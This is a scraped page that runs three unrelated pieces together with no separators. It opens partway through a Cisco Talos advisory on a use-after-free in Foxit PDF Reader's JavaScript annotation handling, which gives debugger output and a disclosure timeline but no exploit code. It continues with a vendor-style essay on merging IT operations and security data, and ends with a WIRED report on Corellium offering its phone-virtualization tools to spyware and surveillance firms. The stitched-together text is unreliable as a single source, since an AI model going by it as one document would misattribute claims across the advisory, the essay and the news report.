        77ae3812 ntdll!RtlFreeHeap+0x00000222
        0463fc6b FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x00484b4b
        0461d121 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x00462001
        045655d2 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x003aa4b2
        01513fd9 FoxitPDFReader!CryptUIWizExport+0x00034699
        016e442d FoxitPDFReader!CryptUIWizExport+0x00204aed
        019b6204 FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x00015f04
        019b622b FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x00015f2b
        00da8efe FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x000458fe
        00da268d FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x0003f08d
        01724664 FoxitPDFReader!CryptUIWizExport+0x00244d24
        01727c0c FoxitPDFReader!CryptUIWizExport+0x002482cc
        0197b9f1 FoxitPDFReader!CryptUIWizExport+0x0049c0b1
        01385d32 FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x002e6532
        01500b7e FoxitPDFReader!CryptUIWizExport+0x0002123e
        02cf7a11 FoxitPDFReader!safe_vsnprintf+0x00e36431
        02ce0972 FoxitPDFReader!safe_vsnprintf+0x00e1f392
        02f54d9b FoxitPDFReader!FXJSE_GetClass+0x0000026b
        03138a8b FoxitPDFReader!CFXJSE_Arguments::GetValue+0x001e361b
        0313824e FoxitPDFReader!CFXJSE_Arguments::GetValue+0x001e2dde
        03138505 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x001e3095
        0313838b FoxitPDFReader!CFXJSE_Arguments::GetValue+0x001e2f1b
        0335a53b FoxitPDFReader!CFXJSE_Arguments::GetValue+0x004050cb
        032f6599 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x003a1129
        032f6599 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x003a1129
        032f4c20 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x0039f7b0
        032f4a49 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x0039f5d9
        02f915ee FoxitPDFReader!CFXJSE_Arguments::GetValue+0x0003c17e
        02f91102 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x0003bc92
    

In the above debugger output, we can see that the crash is due to dereference of invalid memory (with PageHeap enabled). The memory is invalid because it belongs to a freed allocation, as shown by output of !heap. Additionally, the dereference happens as part of a vtable function call, which lends itself to straightforward control flow hijacking. If we step back and examine the size of the object before it’s been freed, we would see:

     0:000> dt _DPH_BLOCK_INFORMATION 27a9afc8
    verifier!_DPH_BLOCK_INFORMATION
       +0x000 StartStamp       : 0xabcdbbbb
       +0x004 Heap             : 0x1a161000 Void
       +0x008 RequestedSize    : 0x14
       +0x00c ActualSize       : 0x1000
       +0x010 Internal         : _DPH_BLOCK_INTERNAL_INFORMATION
       +0x018 StackTrace       : 0x1b507994 Void
       +0x01c EndStamp         : 0xdcbabbbb
    

The freed object that is first being dereferenced is of size 0x14. A newly created annotation is deleted inside the event handler, but is then reused in the main execution thread, which causes a crash. This indicates a use-after-free condition. Since additional Javascript code can be executed between object free and reuse, freed memory could be put under attacker control. With careful memory layout manipulation, this can lead to further memory corruption and ultimately arbitrary code execution.

**TIMELINE**

2022-09-22 - Vendor Disclosure  
2022-11-09 - Vendor Patch Release  
2022-11-10 - Public Release

Discovered by Aleksandar Nikolic of Cisco Talos.

CVE-2022-38097: TALOS-2022-1601 || Cisco Talos Intelligence Group

Threat actors are becoming only more sophisticated and determined.

Current approaches to managing operations and security made sense at the time they were established, pre-cloud and pre-digital transformation. Now, with networked multicloud environments, both digital operations and security are far more complex. And even in the digital world, people and teams want to protect their turf. According to IBM's most recent cyber-resilience report, the top three reasons why cyber resiliency has not improved are:

1.  Inability to reduce silo and turf issues
2.  Fragmented IT and security infrastructure
3.  Lack of visibility into applications and data assets

These are all operational issues.

Operations has been fragmented, with responsibilities scattered across lines of business, including IT, finance, sales and marketing, DevOps, and SecOps. Chief information officers (CIOs) scramble to make sure information is available to those who need it while trying to stay compliant with business and data policies. Meanwhile, chief information security officers (CISOs) focus on protecting assets and data from loss and threats across the entire business. All organizations face a daily flood of data across the multitude of tools and systems they rely on to run their businesses — and yet that data is siloed too.

At the same time, threat actors are increasingly sophisticated and determined. Ransomware is practically a legitimate business — perpetrators have "customer" help desks and arrange payment terms for their victims. Adding tools and people to address security doesn't scale and can no longer solve operational and security issues effectively. The status quo of siloed operations is just not sustainable.

According to IBM's research, the average midsize enterprise runs more than 45 security tools — and that's not to mention those for monitoring applications, the network, and cloud operations. Most are designed for a unique function, which they may do exceedingly well. But together, they can become a management nightmare or be ignored, which is a shame, since their data is valuable. It doesn't make sense to have so many tools yet limit data you ingest — and you also need that data over time to discover potential issues before damage occurs.

**Security and Operations Must Join Forces**

It's time to think differently about approaching both operational integrity _and_ security. Start by considering what ops and security organizations have in common:

1.  **Availability:** Ops is responsible for ensuring business systems and information are available to all who need access. Security teams are responsible for ensuring the right data is available to the right people at the right times on the right devices.
2.  **Risk:** The ops view of risk focuses on keeping everything up and running to avoid downtime and poor performance that kill business productivity and efficiency. Security organizations view risk in terms of data loss, manipulation, and damage to the business.

What if digital operations and security shifted from operating separately — working in silos, managing a lot of tools, duplicating efforts — to working together on a shared data and analytics platform? And what if that platform made them more effective at delivering on their common objectives of providing availability across infrastructure and assets while reducing risk?

Digital ops and security share a common goal of keeping the business operating securely at optimal capacity. To succeed in this shared mission, you need to create a cohesive "digital + security" approach, supported by a team that collaborates and optimizes the resources at hand — both human and machine.

**Security and Operations Need a Common Operational Picture**

For many companies, the cost of running operations takes a disproportionate share of budgets, leaving less to spend on innovation and growth. And it's not helping reduce risk (of downtime or breaches). The only solution is to accelerate digital transformation by shifting focus from worrying about risk to preventing it. And the only way to do that is converging _all_ your operations and security data into a common platform.

Merging ops and security with an information-sharing platform enables fully secured, reliable, and convenient enterprise operations.

By ingesting and analyzing all your operational and security data, you can ultimately derive a common operational picture (COP). From there, you need to connect the dots across ops and security data to gain the context and intelligence necessary to successfully manage risk. Applying advanced analytics and machine learning, organizations can then identify pre-incident situations, rank them by business risk, and correlate them with sufficient context for proactive resolution. 

Ops and security can 100% work together. By doing so, CISOs and CIOs gain insights and can prove damage avoided — which means they can show "goals saved" and quantify value.

Better Together: Why It's Time for Ops and Security to Converge

A 500-page document reviewed by WIRED shows that Corellium engaged with several controversial companies, including spyware maker NSO Group.

Corellium, a cybersecurity startup that sells phone-virtualization software for catching security bugs, offered or sold its tools to controversial government spyware and hacking-tool makers in Israel, the United Arab Emirates, and Russia, and to a cybersecurity firm with potential ties to the Chinese government, according to a leaked document reviewed by WIRED that contains internal company communications.

The 507-page document, apparently prepared by Apple with the goal of using it in the company’s 2019 copyright lawsuit against Corellium, shows that the security firm, whose software lets users perform security analysis using virtual versions of Apple’s iOS and Google’s Android, has dealt with companies that have a track record of selling their tools to repressive regimes and countries with poor human rights records.

According to the leaked document, Corellium in 2019 offered a trial of its product to NSO Group, whose customers have for years been caught using its Pegasus spyware against dissidents, journalists, and human rights defenders. Similarly, Corellium’s sales staff offered to provide a quote to purchase its software to DarkMatter, a now-shuttered cybersecurity company with ties with the UAE government that hired several former US intelligence members who reportedly helped it spy on human rights activists and journalists. 

In correspondence with WIRED, Corellium says NSO Group and Dark Matter had access to “a limited time/limited functionality trial version of Corellium's software” and that both were later denied requests to purchase the full version following its vetting process. 

For years Corellium has painted itself as a crucial defender against software bugs on Android and iOS. But the leaked document shows that Corellium worked with several companies that use bugs and exploits to hack into cell phones, as opposed to helping Google and Apple patch vulnerabilities.

The document includes emails between Corellium staff and customers or potential customers, including NSO Group and DarkMatter. The document is not public and is being reported on for the first time here. 

“As one of our early beta requesters, we’re delighted to extend you and your team at NSO Group an exclusive invitation to try Corellium, the world’s first and only mobile device virtualization platform. We think you’ll really enjoy the advanced mobile security research tools we have to offer,” reads a March 26, 2019, email between Correllium’s support staff and an NSO Group employee. “Your free trial will last until April 9. Trial accounts are limited, but if you need more time, or if you prefer to start your trial at a different time, just let us know.”

In the case of DarkMatter, the document includes an email exchange between a company employee and a Corellium sales email address. The emails are not dated, but they apparently reference a 2019 training on how to use the platform that Corellium offered potential customers at the cybersecurity conference Black Hat.

“I was a trainer at Blackhat last year where you guys had provided us access to the portal for a few days and I was very impressed with the amount of features it had,” the DarkMatter employee wrote. “We are interested in purchasing it. Can you guys provide us a quote for all the available options that you have?”

“We’re so glad to hear that you enjoyed using Corellium at Blackhat, and we actually have DarkMatter on our list of teams to reach out to regarding availability,” an unnamed Corellium employee responded. “We’d be more than happy to provide you a quote with all the options checked.”

Also in 2019, according to the document, Corellium sold its software to Paragon, a little-known company that has since been reported to be a provider of government surveillance technology. Corellium also licensed its software to a company called Pwnzen Infotech, whose founders were part of Pangu Team, a well-known Chinese group of elite iOS and iPhone hackers. A Pwnzen sales representative told Reuters in 2019, when Pwnzen was already a Corellium customer, that the company helped hack the phone of a person suspected of “subverting the government” in China. 

“There are a number of ties between Pwnzen and the People’s Republic of China’s government that are cause for concern,” says Dakota Cary, a consultant at Krebs Stamos Group who has written several reports about cybersecurity in China. “Bolstering Pwnzen’s hacking capabilities likely occurred at the detriment to US security interests,” he added, explaining that the company’s improved capabilities could have provided the Chinese government with better tools to hack targets inside and outside of the country, including the US.

Also, as of today, Corellium counts Russian iPhone hacking company Elcomsoft as a customer. And in 2019, Corellium sold to Elcomsoft’s Israeli competitor Cellebrite, a firm that helps law enforcement unlock iPhones and access the data stored within. Cellebrite has reportedly sold its phone-hacking products to countries such as China, Saudi Arabia, and Bahrain, among others. 

Corellium did not dispute the legitimacy of the document, but it also did not respond to a series of questions about its contents. Instead, Corellium CEO Amanda Gorton shared a draft of a blog post in which the company says it offered trials to NSO Group and DarkMatter but denied that the two companies became customers. 

“We’ve had opportunities to profit from these bad actors and have chosen not to,” the blog post reads. It further explains that Corellium restricts sales of its cloud product to “fewer than sixty countries” and has a “block list” of organizations.

Corellium didn’t specify the 60 countries, nor did it answer specific questions about Paragon, Pwnzen, Cellebrite, or Elcomsoft. The company wrote in the blog post that as the sales process goes on, the vetting gets “more intensive.” According to the blog post, that means Corellium asks about the customer’s use case, consults with “trusted contacts in the security community, including contacts at various US government agencies,” and looks at the potential customer’s online presence and investigates its “ownership, corporate structure, and employees.”

Apple did not respond to a request for comment, nor did NSO Group, Cellebrite, or Pwnzen. XiaBo Chen, who identifies as the founder of Pwnzen on LinkedIn, did not respond to multiple requests for comment. After the controversy surrounding DarkMatter’s role in targeting activists and journalists, the company reportedly rebranded to Digital14 in 2019, then to CPX in 2021. Digital14 and CPX did not respond to requests for comment.

Idan Nurick, the CEO and cofounder at Paragon, says that “as a matter of principle, Paragon maintains the confidentiality of its clients, as well as technology providers, and the company does not disclose any information pertaining to these entities.”

Vladimir Katalov, the CEO, cofounder, and co-owner of Elcomsoft, confirmed that his company is a Corellium customer. 

‘Puzzling’ Claims

The leaked document, prepared in 2021, according to an included timeline, mirrors Apple’s arguments against Corellium, which it accused of violating its copyright and the Digital Millennium Copyright Act by re-creating a virtual version of iOS. While Apple has never publicly presented the evidence that’s contained in the document against Corellium, the tech giant accused Corellium in its lawsuit of helping researchers develop zero-day exploits and spyware for governments around the world, hinting that this was one of the main reasons it didn’t approve of Corellium’s practices, apart from alleged copyright infringement.

“Although Corellium paints itself as providing a research tool for those trying to discover security vulnerabilities and other flaws in Apple’s software, Corellium’s true goal is profiting off its blatant infringement,” Apple said in the complaint. “Far from assisting in fixing vulnerabilities, Corellium encourages its users to sell any discovered information on the open market to the highest bidder.”

Corellium has forcefully defended itself against Apple’s claims, saying it sells to “well-known and well-respected financial institutions, government agencies, and security researchers” who use their product for legitimate purposes.

In December 2020, when he dismissed Apple’s copyright infringement claims, US District Judge Rodney Smith, of the Southern District of Florida, sided with Corellium, writing in the order on the parties’ motions for summary judgment that “Apple’s position is puzzling, if not disingenuous.”

“As for Apple’s contention that Corellium sells its product indiscriminately, that statement is belied by the evidence in the record that the company has a vetting process in place (even if not perfect) and, in the past, has exercised its discretion to withhold the Corellium Product from those it suspects may use the product for nefarious purposes,” the judge wrote. “Having reviewed the evidence, the Court does not find a lack of good faith and fair dealing.”

The case took an unexpected turn in August 2021, when Apple and Corellium settled out of court. (The terms of the deal were confidential.) Then, days later, the tech giant filed an appeal, keeping its case against Corellium alive.

Bad Reputations

Even in 2019, NSO Group and DarkMatter had poor reputations in the world of cybersecurity. At the time, there had already been several examples of abuse of NSO Group’s Pegasus spyware, particularly against journalists in Mexico. Ronald Deibert, the director of the Citizen Lab, a digital rights watchdog housed at the University of Toronto's Munk School that has investigated companies like NSO Group for years, said in March 2019 that there was a “mountain of evidence that NSO Group’s surveillance technology is being abused by its clients, and the company is either unwilling or unable to perform the type of due diligence to prevent that from happening.” 

Both Apple and Microsoft have called NSO Group “21st-century mercenaries.”

Gorton has publicly denied selling Corellium’s products to DarkMatter and NSO Group and said Corellium does not sell to companies in the Middle East.

“We have definitely rejected customers who have approached us. I’m sure you can imagine DarkMatter, NSO Group have all reached out and we just politely declined, we don’t sell to that region,” she said during a November 2021 interview with the _Decipher_ podcast. 

In the interview, she sold her company’s mission as positive and uncontroversial, saying that Corellium can be used to help researchers find bugs and report them to companies like Apple, something that companies like NSO Group, DarkMatter, Paragon, Pwnzen, Cellebrite, and Elcomsoft don’t do. Gorton added that hunting for security bugs is “kind of exactly what we wanted to see the platform used for.”

In the past, other Corellium executives and founders have repeatedly downplayed the possibility that bad actors could use its software. When asked whether he was worried that Corellium customers could use the product to find bugs and develop exploits that would then be used by governments, David Wang, one of the company’s cofounders, told _Forbes_ in 2018 that the company would be “selective in who we choose to do business with.” 

Wang did not respond to WIRED’s request for comment. 

In the podcast interview, Gorton has also fielded questions about how Corellium vets its customers to avoid selling to bad actors and that the company takes this process “very seriously,” selling only in the Asia-Pacific, European Union, and North America regions, and researching companies they don’t recognize. “We err on the side of caution,” she said.

The leaked document includes a 2021 email from Steve Dyer, the vice president of sales and business development at Corellium, to Gorton. In the email, Dyer explains the process for vetting “current and future cloud customers” as they submit requests for trials online. Part of the process, Dyer wrote, is to check that the companies are not from countries sanctioned by the US government, such as North Korea, Sudan, Syria, and Russia. (While Elcomsoft is headquartered in Russia, the company is not sanctioned by the US government.) 

“China has been added to the list for auto-denied trials,” Dyer wrote. 

Last year, the US government added NSO Group to a federal blocklist, preventing any US companies and individuals from doing business with the spyware company. In correspondence with WIRED, Corellium said it voluntarily refused to sell its software to NSO Group “more than two years before the United States Department of Commerce placed NSO Group on its Entity List.”

Nevertheless, Corellium’s engagement with these controversial companies may change the cybersecurity community’s view that Apple’s lawsuit is a case of an entitled tech giant going after a scrappy startup with an innovative product that it doesn’t like. 

John Scott-Railton, a senior researcher at the Citizen Lab, says the Corellium sales department’s outreach to NSO Group and DarkMatter is “a potentially cynical act” given the nature of those companies. “At that point, Corellium and everyone else knew exactly who NSO Group was and what they would do with that kind of technology and the people that would inevitably be harmed,” Scott-Railton says. “It raises questions about their ethics, their judgment, or both.”

Zach Edwards, an independent privacy and security researcher, says that “sensitive technology cannot be haphazardly sold to any company, in any country in the world.”

“While Corellium is a reverse-engineering tool that doesn't intrinsically create risks through its sale, the core purpose of the tool is to reverse malware,” Edwards says. “And if you sell the product to malware developers in countries averse to Western interests, we should assume that this tool will be used to improve malware.”

A person who tried Corellium in the past, who asked to remain anonymous because they were not allowed to speak to the press, says that “given what’s happening in the world today, you shouldn’t be dealing with Russian companies,” such as Elcomsoft. 

Elcomsoft’s CEO Katalov says that “the decision to work with a company based in Russia is a personal choice.”

“Please rest assured that we still strive to provide the best software and services, and trying to keep good relationships with our customers all over the world,” he adds. “We will just keep doing our job, making the world a safer place and battling the crime.”

Adrian Sanabria, a cybersecurity veteran, says that it’s not surprising that “groups interested in creating iOS exploits would be using a platform designed for iOS security research.” 

“For me, the core takeaway is that Apple created the need for platforms like Corellium by not providing the tools, access, and transparency the market needs and desires,” he says.

Danger Zones

Some of the organizations and companies linked to Corellium in the document come from countries seen as controversial by most people in the cybersecurity community in the West, including Alex Stamos, who acted as an expert witness for Corellium in the lawsuit against Apple.  

“I personally don’t believe it would be ethical to sell exploits to Saudi Arabia,” Stamos, the director of Stanford University’s Internet Observatory, said during testimony he provided in the lawsuit between Apple and Corellium, which is quoted in the document.  

Stamos also expressed doubts about selling products to the United Arab Emirates, whose government had a close relationship with DarkMatter. “The UAE has been shown to use malware and exploits to spy on journalists and suppress local dissent,” Stamos said. 

In response to the document’s revelations, Stamos says he doesn’t think “it's appropriate for Apple to use copyright law to try to stop security research, and I don't think it's responsible for Corellium to offer their product to companies known to create malicious software for authoritarian states.”

The document also includes the logos of alleged Corellium customers and companies linked to it. As well as the companies previously mentioned, the document includes the logo of Azimuth, a provider of advanced hacking tools to the intelligence and law enforcement agencies of the so-called Five Eyes. Other logos include the Centre for Strategic Infocomm Technologies of Singapore, or CSIT, as well as the logo of an academic institution in Saudi Arabia called the Center of Excellence in Information Assurance (COEIA), housed at the King Saud University. 

CSIT executives did not respond to a request for comment. Other than the logo of the COEIA, the document also shows a 2019 email titled “invitation to Corellium” sent to the organization. The COEIA did not respond to a request for comment.

The legal battle between Apple and Corellium is ongoing. Late last month, the two companies appeared at a hearing before the Eleventh Circuit of the US Court of Appeals in Florida. Apple’s lawyer, Melissa Sherry, argued that Corellium’s product is just a slightly tweaked version of iOS that’s not transformative enough not to be fair use. Corellium attorney Kevin Russell said the product helps users “shed light on the functionality of the Apple operating system” and is, therefore, fair use.

“I don't think there's a genuine dispute that the purpose of the product is to explore the unprotected functionality of the system's software,” he said. “What people do with that knowledge is the subject of another statute.”

Tag

#ios